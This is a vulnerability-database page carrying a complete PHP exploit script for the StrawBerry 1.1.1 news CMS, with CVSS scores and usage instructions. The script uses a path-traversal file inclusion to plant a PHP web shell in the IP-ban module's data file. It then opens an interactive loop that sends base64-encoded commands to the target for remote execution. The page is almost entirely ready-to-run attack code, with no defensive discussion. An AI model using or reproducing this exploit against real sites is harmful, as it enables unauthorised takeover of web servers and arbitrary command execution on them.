StrawBerry 1.1.1 LFI / Remote Command Execution Exploit

2009-05-24 / 2009-05-25
Credit: AVT
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

<?php /********************************************************************* * StrawBerry 1.1.1 LFI / Remote Command Execution Exploit * * Site: http://strawberry.goodgirl.ru/ * ********************************************************************* * magic_quotes_gpc = Off * ********************************************************************* * Author: [AVT] * * Date : 10.05.09 * * My Site: http://antichat.ru/ * *********************************************************************/ set_time_limit(0); error_reporting(0); list($cli,$host,$path) = $argv; if ($argc != 3) { print "\no-------------------------------------------------------------o\n"; print "\r| StrawBerry 1.1.1 LFI / Remote Command Execution Exploit |\n"; print "\r| Site: http://strawberry.goodgirl.ru/ |\n"; print "\ro-------------------------------------------------------------o\n"; print "\r| Author: [AVT] |\n"; print "\r| My Site: http://antichat.ru/ |\n"; print "\ro-------------------------------------------------------------o\n"; print "\r| Usage: php expl.php [host] [path] |\n"; print "\r| host localhost |\n"; print "\r| path /news/ |\n"; print "\r| Example: php expl.php site.com /news/ |\n"; print "\ro-------------------------------------------------------------o\n"; exit; } if (check_host ()) { post_shell(); } use_shell(); function check_host () { global $host,$path; $data = "GET {$path}example/index.php?do=../../../../db/base/ipban.MYD%00 HTTP/1.1\r\n"; $data .= "Host: $host\r\n"; $data .= "Connection: close\r\n\r\n"; $html = send ($host,$data); if (!stristr($html,'a:')) { print "\ro-------------------------------------------------------------o\n"; print "\r| Exploit Failed! |\n"; print "\ro-------------------------------------------------------------o\n"; exit; } elseif (stristr($html,'<code>')) { return false; } else { return true; } } function send ($host,$data) { if (!$sock = @fsockopen($host,80)) { die("Connection refused, try again!\n"); } fputs($sock,$data); while (!feof($sock)) { $html .= fgets($sock); } fclose($sock); return $html; } function post_shell() { global $host,$path; $post = "add_ip=" . urlencode('<code><?php passthru(base64_decode($_GET[cmd]));?></code>') . "&action=add&mod=ipban"; $data .= "POST {$path}example/index.php?do=../../../../../inc/mod/ipban.mdu%00 HTTP/1.1\r\n"; $data .= "Host: $host\r\n"; $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"; $data .= "Content-Type: application/x-www-form-urlencoded\r\n"; $data .= "Content-Length: ".strlen($post)."\r\n\r\n"; $data .= "$post\r\n\r\n"; send ($host,$data); } function use_shell() { while (1) { echo "[Shell]~$: "; $cmd = stripslashes(trim(fgets(STDIN))); if (preg_match('/^(exit|--exit|quit|--quit)$/i',$cmd)) die("\nExited\n"); print exec_cmd($cmd); } } function exec_cmd($cmd) { global $host,$path; $cmd = base64_encode($cmd); $data .= "GET {$path}example/index.php?cmd={$cmd}&do=../../../../db/base/ipban.MYD%00 HTTP/1.1\r\n"; $data .= "Host: $host\r\n"; $data .= "Connection: close\r\n\r\n"; $html = send ($host,$data); preg_match_all('/<code>(.*)<\/code>/si', $html, $match); return $match[1][0]; } ?>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top